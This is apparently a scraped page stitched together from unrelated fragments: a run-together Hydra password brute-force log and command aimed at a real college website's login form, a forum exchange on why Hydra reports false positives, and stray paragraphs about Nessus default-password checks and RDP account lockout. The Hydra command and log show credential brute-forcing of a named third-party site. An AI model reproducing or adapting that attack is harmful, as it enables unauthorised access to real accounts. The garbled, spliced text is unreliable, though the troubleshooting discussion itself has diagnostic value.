Hydra ( -hydra) starting at 2015-11-07 17:53:46DATA max 16 tasks per 1 server, overall 64 tasks, 497 login tries (l:1/p:497), 0 tries per taskDATA attacking service http-get-form on port 8080http-get-form host: www.bvrit.edu.in login: myUsername password: prince80http-get-form host: www.bvrit.edu.in login: myUsername password: beach80http-get-form host: www.bvrit.edu.in login: myUsername password: porsche80http-get-form host: www.bvrit.edu.in login: myUsername password: amateur80http-get-form host: www.bvrit.edu.in login: myUsername password: united80http-get-form host: www.bvrit.edu.in login: myUsername password: chelsea80http-get-form host: www.bvrit.edu.in login: myUsername password: 1234567880http-get-form host: www.bvrit.edu.in login: myUsername password: 777777780http-get-form host: www.bvrit.edu.in login: myUsername password: cool80http-get-form host: www.bvrit.edu.in login: myUsername password: guitar80http-get-form host: www.bvrit.edu.in login: myUsername password: great80http-get-form host: www.bvrit.edu.in login: myUsername password: jaguar80http-get-form host: www.bvrit.edu.in login: myUsername password: rosebud80http-get-form host: www.bvrit.edu.in login: myUsername password: password80http-get-form host: www.bvrit.edu.in login: myUsername password: butter80http-get-form host: www.bvrit.edu.in login: myUsername password: firebird1 of 1 target successfully completed, 16 valid passwords foundHydra ( -hydra) finished at 2015-11-07 17:53:51__

hydra -l XXXXXXXX -P passwords www.bvrit.edu.in http-form-post "/default.aspx:_VIEWSTATE=XXXXXXXXXXXXXXX&_VIEWSTATEGENERATOR=XXXXXXXXX&_EVENTVALIDATION=XXXXXXXXXXXX&txtId1=&txtPwd1=&txtId2=^USER^&txtPwd2=^PASS^&imgBtn2.x=17&imgBtn2.y=18:Invalid"

Hydra hangs after attempts or returns all passwords valid

No i was asking about Hydra throwing false positives for web forms and telnet? Does it occur frequently because i have faced instances where where hydra throws like two or three valid user names and passwords for a web form or telnet and then when i put them in they are not valid.

Second, your choice of the http-get module may be invalid for the target. Looking at Hydra's source code, http-get will use HTTP basic authentication by default. If the target web server does not use basic authentication and returns a non-error HTTP status code (e.g. 200 OK) when Hydra attempts authentication, Hydra will think that the authentication was successful. It's also possible that while no authentication exists on '/', another path may require it.

In some cases, Nessus can test default accounts and known default passwords. This can cause the account to be locked out if too many consecutive invalid attempts trigger security protocols on the operating system or application. By default, this setting is enabled to prevent Nessus from performing these tests.

If an admin has completed the first two steps and the remote desktop connection credentials are still not working, the next step is to make sure the administrator account has not been locked out. Most organizations configure their Active Directory environments to automatically lock accounts after too many invalid login attempts as an RDP security measure.

2ff7e9595c